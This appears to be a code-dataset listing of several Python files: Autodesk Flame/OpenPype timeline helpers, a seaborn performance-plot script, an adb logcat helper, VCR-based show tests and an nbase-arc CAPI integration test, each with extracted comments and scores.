# make sure the preference folder is available
if not os.path.isdir(self.prefs_folder):
try:
os.makedirs(self.prefs_folder)
except Exception:
self.log.info("Unable to create folder {}".format(
self.prefs_folder))
return False
# get all pref file paths
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path, True) as prefs_file:
pickle.dump(self.prefs, prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path, True) as prefs_file:
pickle.dump(self.prefs_user, prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path, True) as prefs_file:
pickle.dump(self.prefs_global, prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def get_current_project():
import flame
return flame.project.current_project
def get_current_sequence(selection):
import flame
def segment_to_sequence(_segment):
track = _segment.parent
version = track.parent
return version.parent
process_timeline = None
if len(selection) == 1:
if isinstance(selection[0], flame.PySequence):
process_timeline = selection[0]
if isinstance(selection[0], flame.PySegment):
process_timeline = segment_to_sequence(selection[0])
else:
for segment in selection:
if isinstance(segment, flame.PySegment):
process_timeline = segment_to_sequence(segment)
break
return process_timeline
def rescan_hooks():
import flame
try:
flame.execute_shortcut('Rescan Python Hooks')
except Exception:
pass
def get_metadata(project_name, _log=None):
# TODO: can be replaced by MediaInfoFile class method
from adsk.libwiretapPythonClientAPI import (
WireTapClient,
WireTapServerHandle,
WireTapNodeHandle,
WireTapStr
)
class GetProjectColorPolicy(object):
def __init__(self, host_name=None, _log=None):
# Create a connection to the Backburner manager using the Wiretap
# python API.
#
self.log = _log or log
self.host_name = host_name or "localhost"
self._wiretap_client = WireTapClient()
if not self._wiretap_client.init():
raise Exception("Could not initialize Wiretap Client")
self._server = WireTapServerHandle(
"{}:IFFFS".format(self.host_name))
def process(self, project_name):
policy_node_handle = WireTapNodeHandle(
self._server,
"/projects/{}/syncolor/policy".format(project_name)
)
self.log.info(policy_node_handle)
policy = WireTapStr()
if not policy_node_handle.getNodeTypeStr(policy):
self.log.warning(
"Could not retrieve policy of '%s': %s" % (
policy_node_handle.getNodeId().id(),
policy_node_handle.lastError()
)
)
return policy.c_str()
policy_wiretap = GetProjectColorPolicy(_log=_log)
return policy_wiretap.process(project_name)
def get_segment_data_marker(segment, with_marker=None):
"""
Get openpype track item tag created by creator or loader plugin.
Attributes:
segment (flame.PySegment): flame api object
with_marker (bool)[optional]: if true it will return also marker object
Returns:
dict: openpype tag data
Returns(with_marker=True):
flame.PyMarker, dict
"""
for marker in segment.markers:
comment = marker.comment.get_value()
color = marker.colour.get_value()
name = marker.name.get_value()
if (name == MARKER_NAME) and (
color == COLOR_MAP[MARKER_COLOR]):
if not with_marker:
return json.loads(comment)
else:
return marker, json.loads(comment)
def set_segment_data_marker(segment, data=None):
"""
Set openpype track item tag to input segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
dict: json loaded data
"""
data = data or dict()
marker_data = get_segment_data_marker(segment, True)
if marker_data:
# get available openpype tag if any
marker, tag_data = marker_data
# update tag data with new data
tag_data.update(data)
# update marker with tag data
marker.comment = json.dumps(tag_data)
else:
# update tag data with new data
marker = create_segment_data_marker(segment)
# add tag data to marker's comment
marker.comment = json.dumps(data)
def set_publish_attribute(segment, value):
""" Set Publish attribute in input Tag object
Attribute:
segment (flame.PySegment)): flame api object
value (bool): True or False
"""
tag_data = get_segment_data_marker(segment)
tag_data["publish"] = value
# set data to the publish attribute
set_segment_data_marker(segment, tag_data)
def get_publish_attribute(segment):
""" Get Publish attribute from input Tag object
Attribute:
segment (flame.PySegment)): flame api object
Returns:
bool: True or False
"""
tag_data = get_segment_data_marker(segment)
if not tag_data:
set_publish_attribute(segment, MARKER_PUBLISH_DEFAULT)
return MARKER_PUBLISH_DEFAULT
return tag_data["publish"]
def create_segment_data_marker(segment):
""" Create openpype marker on a segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
flame.PyMarker: flame api object
"""
# get duration of segment
duration = segment.record_duration.relative_frame
# calculate start frame of the new marker
start_frame = int(segment.record_in.relative_frame) + int(duration / 2)
# create marker
marker = segment.create_marker(start_frame)
# set marker name
marker.name = MARKER_NAME
# set duration
marker.duration = MARKER_DURATION
# set colour
marker.colour = COLOR_MAP[MARKER_COLOR] # Red
return marker
def get_sequence_segments(sequence, selected=False):
segments = []
# loop versions in sequence
for ver in sequence.versions:
# loop track in versions
for track in ver.tracks:
# ignore all empty tracks and hidden too
if len(track.segments) == 0 and track.hidden:
continue
# loop all segment in remaining tracks
for segment in track.segments:
if segment.name.get_value() == "":
continue
if segment.hidden.get_value() is True:
continue
if (
selected is True
and segment.selected.get_value() is not True
):
continue
# add it to original selection
segments.append(segment)
return segments
@contextlib.contextmanager
def maintained_segment_selection(sequence):
"""Maintain selection during context
Attributes:
sequence (flame.PySequence): python api object
Yield:
list of flame.PySegment
Example:
>>> with maintained_segment_selection(sequence) as selected_segments:
... for segment in selected_segments:
... segment.selected = False
>>> print(segment.selected)
True
"""
selected_segments = get_sequence_segments(sequence, True)
try:
# do the operation on selected segments
yield selected_segments
finally:
# reset all selected clips
reset_segment_selection(sequence)
# select only original selection of segments
for segment in selected_segments:
segment.selected = True
def reset_segment_selection(sequence):
"""Deselect all selected nodes
"""
for ver in sequence.versions:
for track in ver.tracks:
if len(track.segments) == 0 and track.hidden:
continue
for segment in track.segments:
segment.selected = False
def _get_shot_tokens_values(clip, tokens):
old_value = None
output = {}
if not clip.shot_name:
return output
old_value = clip.shot_name.get_value()
for token in tokens:
clip.shot_name.set_value(token)
_key = str(re.sub("[<>]", "", token)).replace(" ", "_")
try:
output[_key] = int(clip.shot_name.get_value())
except ValueError:
output[_key] = clip.shot_name.get_value()
clip.shot_name.set_value(old_value)
return output
def get_segment_attributes(segment):
if segment.name.get_value() == "":
return None
# Add timeline segment to tree
clip_data = {
"shot_name": segment.shot_name.get_value(),
"segment_name": segment.name.get_value(),
"segment_comment": segment.comment.get_value(),
"tape_name": segment.tape_name,
"source_name": segment.source_name,
"fpath": segment.file_path,
"PySegment": segment
}
# head and tail with forward compatibility
if segment.head:
# `infinite` can be also returned
if isinstance(segment.head, str):
clip_data["segment_head"] = 0
else:
clip_data["segment_head"] = int(segment.head)
if segment.tail:
# `infinite` can be also returned
if isinstance(segment.tail, str):
clip_data["segment_tail"] = 0
else:
clip_data["segment_tail"] = int(segment.tail)
# add all available shot tokens
shot_tokens = _get_shot_tokens_values(segment, [
"<colour space>", "<width>", "<height>", "<depth>", "<segment>",
"<track>", "<track name>"
])
clip_data.update(shot_tokens)
# populate shot source metadata
segment_attrs = [
"record_duration", "record_in", "record_out",
"source_duration", "source_in", "source_out"
]
segment_attrs_data = {}
for attr_name in segment_attrs:
if not hasattr(segment, attr_name):
continue
attr = getattr(segment, attr_name)
segment_attrs_data[attr] = str(attr).replace("+", ":")
if attr_name in ["record_in", "record_out"]:
clip_data[attr_name] = attr.relative_frame
else:
clip_data[attr_name] = attr.frame
clip_data["segment_timecodes"] = segment_attrs_data
return clip_data
def get_clips_in_reels(project):
output_clips = []
project_desktop = project.current_workspace.desktop
for reel_group in project_desktop.reel_groups:
for reel in reel_group.reels:
for clip in reel.clips:
clip_data = {
"PyClip": clip,
"fps": float(str(clip.frame_rate)[:-4])
}
attrs = [
"name", "width", "height",
"ratio", "sample_rate", "bit_depth"
]
for attr in attrs:
val = getattr(clip, attr)
clip_data[attr] = val
version = clip.versions[-1]
track = version.tracks[-1]
for segment in track.segments:
segment_data = get_segment_attributes(segment)
clip_data.update(segment_data)
output_clips.append(clip_data)
return output_clips
def get_reformated_filename(filename, padded=True):
"""
Return fixed python expression path
Args:
filename (str): file name
Returns:
type: string with reformated path
Example:
get_reformated_filename("plate.1001.exr") > plate.%04d.exr
"""
found = FRAME_PATTERN.search(filename)
if not found:
log.info("File name is not sequence: {}".format(filename))
return filename
padding = get_padding_from_filename(filename)
replacement = "%0{}d".format(padding) if padded else "%d"
start_idx, end_idx = found.span(1)
return replacement.join(
[filename[:start_idx], filename[end_idx:]]
)
def get_padding_from_filename(filename):
"""
Return padding number from Flame path style
Args:
filename (str): file name
Returns:
int: padding number
Example:
get_padding_from_filename("plate.0001.exr") > 4
"""
found = get_frame_from_filename(filename)
return len(found) if found else None
def get_frame_from_filename(filename):
"""
Return sequence number from Flame path style
Args:
filename (str): file name
Returns:
int: sequence frame number
Example:
def get_frame_from_filename(path):
("plate.0001.exr") > 0001
"""
found = re.findall(FRAME_PATTERN, filename)
return found.pop() if found else None
@contextlib.contextmanager
def maintained_object_duplication(item):
"""Maintain input item duplication
Attributes:
item (any flame.PyObject): python api object
Yield:
duplicate input PyObject type
"""
import flame
# Duplicate the clip to avoid modifying the original clip
duplicate = flame.duplicate(item)
try:
# do the operation on selected segments
yield duplicate
finally:
# delete the item at the end
flame.delete(duplicate)
@contextlib.contextmanager
def maintained_temp_file_path(suffix=None):
_suffix = suffix or ""
try:
# Store dumped json to temporary file
temporary_file = tempfile.mktemp(
suffix=_suffix, prefix="flame_maintained_")
yield temporary_file.replace("\\", "/")
except IOError as _error:
raise IOError(
"Not able to create temp json file: {}".format(_error))
finally:
# Remove the temporary json
os.remove(temporary_file)
def get_clip_segment(flame_clip):
name = flame_clip.name.get_value()
version = flame_clip.versions[0]
track = version.tracks[0]
segments = track.segments
if len(segments) < 1:
raise ValueError("Clip `{}` has no segments!".format(name))
if len(segments) > 1:
raise ValueError("Clip `{}` has too many segments!".format(name))
return segments[0]
def get_batch_group_from_desktop(name):
project = get_current_project()
project_desktop = project.current_workspace.desktop
for bgroup in project_desktop.batch_groups:
if bgroup.name.get_value() in name:
return bgroup
class MediaInfoFile(object):
"""Class to get media info file clip data
Raises:
IOError: MEDIA_SCRIPT_PATH path doesn't exists
TypeError: Not able to generate clip xml data file
ET.ParseError: Missing clip in xml clip data
IOError: Not able to save xml clip data to file
Attributes:
str: `MEDIA_SCRIPT_PATH` path to flame binary
logging.Logger: `log` logger
TODO: add method for getting metadata to dict
"""
MEDIA_SCRIPT_PATH = "/opt/Autodesk/mio/current/dl_get_media_info"
log = log
_clip_data = None
_start_frame = None
_fps = None
_drop_mode = None
def __init__(self, path, **kwargs):
# replace log if any
if kwargs.get("logger"):
self.log = kwargs["logger"]
# test if `dl_get_media_info` paht exists
self._validate_media_script_path()
# derivate other feed variables
self.feed_basename = os.path.basename(path)
self.feed_dir = os.path.dirname(path)
self.feed_ext = os.path.splitext(self.feed_basename)[1][1:].lower()
with maintained_temp_file_path(".clip") as tmp_path:
self.log.info("Temp File: {}".format(tmp_path))
self._generate_media_info_file(tmp_path)
# get clip data and make them single if there is multiple
# clips data
xml_data = self._make_single_clip_media_info(tmp_path)
self.log.debug("xml_data: {}".format(xml_data))
self.log.debug("type: {}".format(type(xml_data)))
# get all time related data and assign them
self._get_time_info_from_origin(xml_data)
self.log.debug("start_frame: {}".format(self.start_frame))
self.log.debug("fps: {}".format(self.fps))
self.log.debug("drop frame: {}".format(self.drop_mode))
self.clip_data = xml_data
@property
def clip_data(self):
"""Clip's xml clip data
Returns:
xml.etree.ElementTree: xml data
"""
return self._clip_data
@clip_data.setter
def clip_data(self, data):
self._clip_data = data
@property
def start_frame(self):
""" Clip's starting frame found in timecode
Returns:
int: number of frames
"""
return self._start_frame
@start_frame.setter
def start_frame(self, number):
self._start_frame = int(number)
@property
def fps(self):
""" Clip's frame rate
Returns:
float: frame rate
"""
return self._fps
@fps.setter
def fps(self, fl_number):
self._fps = float(fl_number)
@property
def drop_mode(self):
""" Clip's drop frame mode
Returns:
str: drop frame flag
"""
return self._drop_mode
@drop_mode.setter
def drop_mode(self, text):
self._drop_mode = str(text)
def _validate_media_script_path(self):
if not os.path.isfile(self.MEDIA_SCRIPT_PATH):
raise IOError("Media Scirpt does not exist: `{}`".format(
self.MEDIA_SCRIPT_PATH))
def _generate_media_info_file(self, fpath):
# Create cmd arguments for gettig xml file info file
cmd_args = [
self.MEDIA_SCRIPT_PATH,
"-e", self.feed_ext,
"-o", fpath,
self.feed_dir
]
try:
# execute creation of clip xml template data
openpype.run_subprocess(cmd_args)
except TypeError as error:
raise TypeError(
"Error creating `{}` due: {}".format(fpath, error))
def _make_single_clip_media_info(self, fpath):
with open(fpath) as f:
lines = f.readlines()
_added_root = itertools.chain(
"<root>", deepcopy(lines)[1:], "</root>")
new_root = ET.fromstringlist(_added_root)
# find the clip which is matching to my input name
xml_clips = new_root.findall("clip")
matching_clip = None
for xml_clip in xml_clips:
if xml_clip.find("name").text in self.feed_basename:
matching_clip = xml_clip
if matching_clip is None:
# return warning there is missing clip
raise ET.ParseError(
"Missing clip in `{}`. Available clips {}".format(
self.feed_basename, [
xml_clip.find("name").text
for xml_clip in xml_clips
]
))
return matching_clip
def _get_time_info_from_origin(self, xml_data):
try:
for out_track in xml_data.iter('track'):
for out_feed in out_track.iter('feed'):
# start frame
out_feed_nb_ticks_obj = out_feed.find(
'startTimecode/nbTicks')
self.start_frame = out_feed_nb_ticks_obj.text
# fps
out_feed_fps_obj = out_feed.find(
'startTimecode/rate')
self.fps = out_feed_fps_obj.text
# drop frame mode
out_feed_drop_mode_obj = out_feed.find(
'startTimecode/dropMode')
self.drop_mode = out_feed_drop_mode_obj.text
break
else:
continue
except Exception as msg:
self.log.warning(msg)
@staticmethod
def write_clip_data_to_file(fpath, xml_element_data):
""" Write xml element of clip data to file
Args:
fpath (string): file path
xml_element_data (xml.etree.ElementTree.Element): xml data
Raises:
IOError: If data could not be written to file
"""
try:
# save it as new file
tree = cET.ElementTree(xml_element_data)
tree.write(
fpath, xml_declaration=True,
method='xml', encoding='UTF-8'
)
except IOError as error:
raise IOError(
"Not able to write data to file: {}".format(error))
| en | 0.641196 | # singleton used for passing data between api modules # flameAppFramework class takes care of preferences # don"t delegate w/ super - dict.copy() -> dict :( # self.prefs scope is limited to flame project and user # menu auto-refresh defaults # make sure the preference folder is available # get all pref file paths # TODO: can be replaced by MediaInfoFile class method # Create a connection to the Backburner manager using the Wiretap # python API. # Get openpype track item tag created by creator or loader plugin. Attributes: segment (flame.PySegment): flame api object with_marker (bool)[optional]: if true it will return also marker object Returns: dict: openpype tag data Returns(with_marker=True): flame.PyMarker, dict Set openpype track item tag to input segment. Attributes: segment (flame.PySegment): flame api object Returns: dict: json loaded data # get available openpype tag if any # update tag data with new data # update marker with tag data # update tag data with new data # add tag data to marker's comment Set Publish attribute in input Tag object Attribute: segment (flame.PySegment)): flame api object value (bool): True or False # set data to the publish attribute Get Publish attribute from input Tag object Attribute: segment (flame.PySegment)): flame api object Returns: bool: True or False Create openpype marker on a segment. Attributes: segment (flame.PySegment): flame api object Returns: flame.PyMarker: flame api object # get duration of segment # calculate start frame of the new marker # create marker # set marker name # set duration # set colour # Red # loop versions in sequence # loop track in versions # ignore all empty tracks and hidden too # loop all segment in remaining tracks # add it to original selection Maintain selection during context Attributes: sequence (flame.PySequence): python api object Yield: list of flame.PySegment Example: >>> with maintained_segment_selection(sequence) as selected_segments: ... for segment in selected_segments: ... segment.selected = False >>> print(segment.selected) True # do the operation on selected segments # reset all selected clips # select only original selection of segments Deselect all selected nodes # Add timeline segment to tree # head and tail with forward compatibility # `infinite` can be also returned # `infinite` can be also returned # add all available shot tokens # populate shot source metadata Return fixed python expression path Args: filename (str): file name Returns: type: string with reformated path Example: get_reformated_filename("plate.1001.exr") > plate.%04d.exr Return padding number from Flame path style Args: filename (str): file name Returns: int: padding number Example: get_padding_from_filename("plate.0001.exr") > 4 Return sequence number from Flame path style Args: filename (str): file name Returns: int: sequence frame number Example: def get_frame_from_filename(path): ("plate.0001.exr") > 0001 Maintain input item duplication Attributes: item (any flame.PyObject): python api object Yield: duplicate input PyObject type # Duplicate the clip to avoid modifying the original clip # do the operation on selected segments # delete the item at the end # Store dumped json to temporary file # Remove the temporary json Class to get media info file clip data Raises: IOError: MEDIA_SCRIPT_PATH path doesn't exists TypeError: Not able to generate clip xml data file ET.ParseError: Missing clip in xml clip data IOError: Not able to save xml clip data to file Attributes: str: `MEDIA_SCRIPT_PATH` path to flame binary logging.Logger: `log` logger TODO: add method for getting metadata to dict # replace log if any # test if `dl_get_media_info` paht exists # derivate other feed variables # get clip data and make them single if there is multiple # clips data # get all time related data and assign them Clip's xml clip data Returns: xml.etree.ElementTree: xml data Clip's starting frame found in timecode Returns: int: number of frames Clip's frame rate Returns: float: frame rate Clip's drop frame mode Returns: str: drop frame flag # Create cmd arguments for gettig xml file info file # execute creation of clip xml template data # find the clip which is matching to my input name # return warning there is missing clip # start frame # fps # drop frame mode Write xml element of clip data to file Args: fpath (string): file path xml_element_data (xml.etree.ElementTree.Element): xml data Raises: IOError: If data could not be written to file # save it as new file | 2.073997 | 2 |
newanalysis/plot_performances.py | nriesterer/cogsci-individualization | 0 | 10396 | import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
if len(sys.argv) != 3:
print('usage: python plot_performances.py <group_csv> <indiv_csv>')
exit()
group_file = sys.argv[1]
indiv_file = sys.argv[2]
# Load the data
df_group = pd.read_csv(group_file)
df_indiv = pd.read_csv(indiv_file)
df = pd.concat([df_group, df_indiv], sort=True)
# Prepare the data for plotting
plot_df = df.groupby(['model', 'id'], as_index=False)['hit'].agg('mean')
mfa_df = plot_df.loc[plot_df['model'] == 'MFA']
mfa_median = mfa_df['hit'].median()
plot_df = plot_df.loc[plot_df['model'] != 'MFA']
# Plot the data
sns.set(style='whitegrid', palette='colorblind')
plt.figure(figsize=(7, 3))
order = plot_df.groupby('model', as_index=False)['hit'].agg('median').sort_values('hit')['model']
colors = [('C0' if 'mReasoner' in x else 'C2') for x in order]
sns.boxplot(x='model', y='hit', data=plot_df, order=order, palette=colors)
plt.axhline(y=mfa_median, ls='--', color='C7', zorder=10)
plt.text(0.002, mfa_median + 0.015, 'MFA', color='C7', fontsize=10, transform=plt.gca().transAxes)
plt.xlabel('')
plt.yticks(np.arange(0, 1.1, 0.1))
plt.ylabel('Coverage Accuracy')
plt.tight_layout()
plt.savefig('visualizations/performances.pdf')
plt.show()
| import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
if len(sys.argv) != 3:
print('usage: python plot_performances.py <group_csv> <indiv_csv>')
exit()
group_file = sys.argv[1]
indiv_file = sys.argv[2]
# Load the data
df_group = pd.read_csv(group_file)
df_indiv = pd.read_csv(indiv_file)
df = pd.concat([df_group, df_indiv], sort=True)
# Prepare the data for plotting
plot_df = df.groupby(['model', 'id'], as_index=False)['hit'].agg('mean')
mfa_df = plot_df.loc[plot_df['model'] == 'MFA']
mfa_median = mfa_df['hit'].median()
plot_df = plot_df.loc[plot_df['model'] != 'MFA']
# Plot the data
sns.set(style='whitegrid', palette='colorblind')
plt.figure(figsize=(7, 3))
order = plot_df.groupby('model', as_index=False)['hit'].agg('median').sort_values('hit')['model']
colors = [('C0' if 'mReasoner' in x else 'C2') for x in order]
sns.boxplot(x='model', y='hit', data=plot_df, order=order, palette=colors)
plt.axhline(y=mfa_median, ls='--', color='C7', zorder=10)
plt.text(0.002, mfa_median + 0.015, 'MFA', color='C7', fontsize=10, transform=plt.gca().transAxes)
plt.xlabel('')
plt.yticks(np.arange(0, 1.1, 0.1))
plt.ylabel('Coverage Accuracy')
plt.tight_layout()
plt.savefig('visualizations/performances.pdf')
plt.show()
| en | 0.488383 | # Load the data # Prepare the data for plotting # Plot the data | 2.499362 | 2 |
src/helpers.py | demirdagemir/thesis | 0 | 10397 | <filename>src/helpers.py
from Aion.utils.data import getADBPath
import subprocess
def dumpLogCat(apkTarget):
# Aion/shared/DroidutanTest.py
# Define frequently-used commands
# TODO: Refactor adbID
adbID = "192.168.58.101:5555"
adbPath = getADBPath()
dumpLogcatCmd = [adbPath, "-s", adbID, "logcat", "-d"]
clearLogcatCmd = [adbPath, "-s", adbID, "-c"]
# 5. Dump the system log to file
logcatFile = open(apkTarget.replace(".apk", ".log"), "w")
prettyPrint("Dumping logcat")
subprocess.Popen(dumpLogcatCmd, stderr=subprocess.STDOUT, stdout=logcatFile).communicate()[0]
logcatFile.close()
| <filename>src/helpers.py
from Aion.utils.data import getADBPath
import subprocess
def dumpLogCat(apkTarget):
# Aion/shared/DroidutanTest.py
# Define frequently-used commands
# TODO: Refactor adbID
adbID = "192.168.58.101:5555"
adbPath = getADBPath()
dumpLogcatCmd = [adbPath, "-s", adbID, "logcat", "-d"]
clearLogcatCmd = [adbPath, "-s", adbID, "-c"]
# 5. Dump the system log to file
logcatFile = open(apkTarget.replace(".apk", ".log"), "w")
prettyPrint("Dumping logcat")
subprocess.Popen(dumpLogcatCmd, stderr=subprocess.STDOUT, stdout=logcatFile).communicate()[0]
logcatFile.close()
| en | 0.749883 | # Aion/shared/DroidutanTest.py # Define frequently-used commands # TODO: Refactor adbID # 5. Dump the system log to file | 2.286941 | 2 |
tests/test_show.py | domi007/pigskin | 6 | 10398 | from collections import OrderedDict
import pytest
import vcr
try: # Python 2.7
# requests's ``json()`` function returns strings as unicode (as per the
# JSON spec). In 2.7, those are of type unicode rather than str. basestring
# was created to help with that.
# https://docs.python.org/2/library/functions.html#basestring
basestring = basestring
except NameError:
basestring = str
@pytest.mark.incremental
class TestShow(object):
"""These don't require authentication to Game Pass."""
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_desc(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.desc, basestring)
# content is not required
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_logo(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.logo, basestring)
assert show.logo
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_name(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.name, basestring)
assert show.name
@vcr.use_cassette('public_API/europe_show_seasons.yaml')
@staticmethod
def test_seasons(gp):
shows = gp.shows
for s in shows:
show = shows[s]
assert type(show.seasons) is OrderedDict
assert show.seasons
prev = 9999
for s in show.seasons:
season = show.seasons[s]
# TODO: assert it has content
# TODO: assert is type season
# make sure the years look sane-ish
assert int(s) > 2000 and int(s) < 2050
# make sure it's sorted high to low
assert int(prev) > int(s)
prev = s
| from collections import OrderedDict
import pytest
import vcr
try: # Python 2.7
# requests's ``json()`` function returns strings as unicode (as per the
# JSON spec). In 2.7, those are of type unicode rather than str. basestring
# was created to help with that.
# https://docs.python.org/2/library/functions.html#basestring
basestring = basestring
except NameError:
basestring = str
@pytest.mark.incremental
class TestShow(object):
"""These don't require authentication to Game Pass."""
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_desc(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.desc, basestring)
# content is not required
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_logo(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.logo, basestring)
assert show.logo
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_name(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.name, basestring)
assert show.name
@vcr.use_cassette('public_API/europe_show_seasons.yaml')
@staticmethod
def test_seasons(gp):
shows = gp.shows
for s in shows:
show = shows[s]
assert type(show.seasons) is OrderedDict
assert show.seasons
prev = 9999
for s in show.seasons:
season = show.seasons[s]
# TODO: assert it has content
# TODO: assert is type season
# make sure the years look sane-ish
assert int(s) > 2000 and int(s) < 2050
# make sure it's sorted high to low
assert int(prev) > int(s)
prev = s
| en | 0.921252 | # Python 2.7 # requests's ``json()`` function returns strings as unicode (as per the # JSON spec). In 2.7, those are of type unicode rather than str. basestring # was created to help with that. # https://docs.python.org/2/library/functions.html#basestring These don't require authentication to Game Pass. # content is not required # TODO: assert it has content # TODO: assert is type season # make sure the years look sane-ish # make sure it's sorted high to low | 2.609136 | 3 |
integration_test/basic_op_capi.py | cl9200/nbase-arc | 0 | 10399 | <reponame>cl9200/nbase-arc<gh_stars>0
#
# Copyright 2015 N<NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import unittest
import testbase
import default_cluster
import util
import os
import constant
import config
import time
import telnetlib
import signal
class TestBasicOpCAPI(unittest.TestCase):
cluster = config.clusters[2]
@classmethod
def setUpClass(cls):
return 0
@classmethod
def tearDownClass(cls):
return 0
def setUp(self):
util.set_process_logfile_prefix( 'TestBasicOp_%s' % self._testMethodName )
self.conf_checker = default_cluster.initialize_starting_up_smr_before_redis(self.cluster, arch=self.arch)
self.assertIsNotNone(self.conf_checker, 'failed to initialize cluster')
def tearDown(self):
testbase.defaultTearDown(self)
def run_capi_server(self):
# run capi test server
_capi_server_conf = """
zookeeper 127.0.0.1:2181
cluster_name %s
port 6200
daemonize no
num_conn_per_gw 2
init_timeout_millis 10000
log_level INFO
log_file_prefix "capi_server"
max_fd 4096
conn_reconnect_millis 1000
zk_reconnect_millis 1000
zk_session_timeout_millis 10000
local_proxy_query_timeout_millis 10000
""" % self.cluster['cluster_name']
old_cwd = os.path.abspath( os.getcwd() )
os.chdir(util.capi_dir(0))
f = open('capi_server.conf', 'w')
f.write(_capi_server_conf)
f.close()
os.chdir(old_cwd)
if self.arch is 32:
cmd = "./%s capi_server.conf" % constant.CAPI32_TEST_SERVER
else:
cmd = "./%s capi_server.conf" % constant.CAPI_TEST_SERVER
capi_server = util.exec_proc_async(util.capi_dir(0),
cmd, True, None, subprocess.PIPE, None)
# ping check
while True:
try:
t = telnetlib.Telnet('127.0.0.1', 6200)
break
except:
time.sleep(1)
continue
t.write("ping\r\n")
t.read_until('+PONG\r\n')
t.close()
return capi_server
def stop_process(self, capi_server):
capi_server.send_signal(signal.SIGTERM)
capi_server.wait()
def test_basic_op_capi(self):
capi_server = self.run_capi_server()
f = open("%s/test_basicop_output_capi%d" % (constant.logdir, self.arch), 'w')
p = util.exec_proc_async("../redis-%s" % constant.REDISVER,
"./runtest_gw --accurate --gw-port 6200",
True, None, f, None)
ret = p.wait()
f.close()
self.assertEquals(0, ret)
self.stop_process(capi_server)
| #
# Copyright 2015 N<NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import unittest
import testbase
import default_cluster
import util
import os
import constant
import config
import time
import telnetlib
import signal
class TestBasicOpCAPI(unittest.TestCase):
cluster = config.clusters[2]
@classmethod
def setUpClass(cls):
return 0
@classmethod
def tearDownClass(cls):
return 0
def setUp(self):
util.set_process_logfile_prefix( 'TestBasicOp_%s' % self._testMethodName )
self.conf_checker = default_cluster.initialize_starting_up_smr_before_redis(self.cluster, arch=self.arch)
self.assertIsNotNone(self.conf_checker, 'failed to initialize cluster')
def tearDown(self):
testbase.defaultTearDown(self)
def run_capi_server(self):
# run capi test server
_capi_server_conf = """
zookeeper 127.0.0.1:2181
cluster_name %s
port 6200
daemonize no
num_conn_per_gw 2
init_timeout_millis 10000
log_level INFO
log_file_prefix "capi_server"
max_fd 4096
conn_reconnect_millis 1000
zk_reconnect_millis 1000
zk_session_timeout_millis 10000
local_proxy_query_timeout_millis 10000
""" % self.cluster['cluster_name']
old_cwd = os.path.abspath( os.getcwd() )
os.chdir(util.capi_dir(0))
f = open('capi_server.conf', 'w')
f.write(_capi_server_conf)
f.close()
os.chdir(old_cwd)
if self.arch is 32:
cmd = "./%s capi_server.conf" % constant.CAPI32_TEST_SERVER
else:
cmd = "./%s capi_server.conf" % constant.CAPI_TEST_SERVER
capi_server = util.exec_proc_async(util.capi_dir(0),
cmd, True, None, subprocess.PIPE, None)
# ping check
while True:
try:
t = telnetlib.Telnet('127.0.0.1', 6200)
break
except:
time.sleep(1)
continue
t.write("ping\r\n")
t.read_until('+PONG\r\n')
t.close()
return capi_server
def stop_process(self, capi_server):
capi_server.send_signal(signal.SIGTERM)
capi_server.wait()
def test_basic_op_capi(self):
capi_server = self.run_capi_server()
f = open("%s/test_basicop_output_capi%d" % (constant.logdir, self.arch), 'w')
p = util.exec_proc_async("../redis-%s" % constant.REDISVER,
"./runtest_gw --accurate --gw-port 6200",
True, None, f, None)
ret = p.wait()
f.close()
self.assertEquals(0, ret)
self.stop_process(capi_server) | en | 0.706632 | # # Copyright 2015 N<NAME>. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # run capi test server zookeeper 127.0.0.1:2181 cluster_name %s port 6200 daemonize no num_conn_per_gw 2 init_timeout_millis 10000 log_level INFO log_file_prefix "capi_server" max_fd 4096 conn_reconnect_millis 1000 zk_reconnect_millis 1000 zk_session_timeout_millis 10000 local_proxy_query_timeout_millis 10000 # ping check | 1.802132 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.